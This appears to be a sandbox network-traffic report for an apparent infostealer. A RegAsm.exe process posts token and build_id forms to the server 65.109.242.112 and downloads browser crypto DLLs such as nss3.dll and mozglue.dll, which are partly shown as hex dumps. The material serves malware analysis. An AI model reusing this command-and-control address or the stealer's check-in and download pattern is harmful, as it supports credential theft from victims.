2024-05-12 10:47:11 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 41 41 46 42 4b 46 49 45 43 41 41 4b 45 43 47 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FCAAAAFBKFIECAAKECGCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FCAAAAFBKFIECAAKECGCCont
2024-05-12 10:47:12 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:12 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49745 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:12 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGDAAKJJDAAKFHJKJKFC
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 437
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:12 UTC | 437 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 41 41 4b 4a 4a 44 41 41 4b 46 48 4a 4b 4a 4b 46 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------BGDAAKJJDAAKFHJKJKFCContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------BGDAAKJJDAAKFHJKJKFCCont
2024-05-12 10:47:14 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:13 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:14 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49747 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:13 UTC | 221 | OUT | GET /freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:14 UTC | 246 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:14 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 685392
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-a7550"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49749 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:17 UTC | 221 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Cache-Control: no-cache
2024-05-12 10:47:18 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:17 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-94750"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49750 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:20 UTC | 222 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Cache-Control: no-cache
2024-05-12 10:47:21 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:21 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-6dde8"
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                                                Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                                                Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                                                2024-05-12 10:47:22 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                                                Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49751 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:23 UTC | 218 | OUT | GET /nss3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Cache-Control: no-cache
2024-05-12 10:47:24 UTC | 248 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:24 GMT
Content-Type: application/octet-stream
Content-Length: 2046288
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-1f3950"
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49752 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:27 UTC | 222 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
Host: 65.109.242.112
Cache-Control: no-cache
2024-05-12 10:47:28 UTC | 246 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 10:47:28 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
Connection: close
ETag: "6315a9f4-3ef50"
Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c
                                                                                                                                                                                                                                                                Data Ascii: !=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7|
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a
                                                                                                                                                                                                                                                                Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf
                                                                                                                                                                                                                                                                Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZVxM@
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73
                                                                                                                                                                                                                                                                Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00
                                                                                                                                                                                                                                                                Data Ascii: USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4|~
                                                                                                                                                                                                                                                                2024-05-12 10:47:29 UTC16384INData Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff
                                                                                                                                                                                                                                                                Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49753 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:30 UTC | 226 | OUT | GET /vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:31 UTC | 245 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:31 GMT
                                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                Content-Length: 80880
                                                                                                                                                                                                                                                                Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                ETag: "6315a9f4-13bf0"
                                                                                                                                                                                                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49754 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:33 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 1145
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                2024-05-12 10:47:33 UTC1145OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 32 33 34 63 65 31 39 31 64 39 30 37 35 39 33 32 39 36 65 65 38 38 62 36 37 39 33 61 37 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 38 31 61 32 32 33 62 65 63 31 38 30 65 62 66 64 63 34 38 35 34 37 64 33 64 35 62 64 37 38 34 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------FHDAFIIDAKJDGDHIDAKJCont
2024-05-12 10:47:34 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:34 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                2024-05-12 10:47:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49755 | 65.109.242.112 | 443 | 2832 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-12 10:47:34 UTC | 326 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIE
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 OPR/101.0.0.0
                                                                                                                                                                                                                                                                Host: 65.109.242.112
                                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-05-12 10:47:34 UTC | 331 | OUT
                                                                                                                                                                                                                                                                Data Ascii: ------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="token"b234ce191d907593296ee88b6793a7e5------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="build_id"681a223bec180ebfdc48547d3d5bd784------CFBAFBFIEHIDBGDHCGIECont
2024-05-12 10:47:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Sun, 12 May 2024 10:47:35 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-05-12 10:47:35 UTC | 2228 | IN
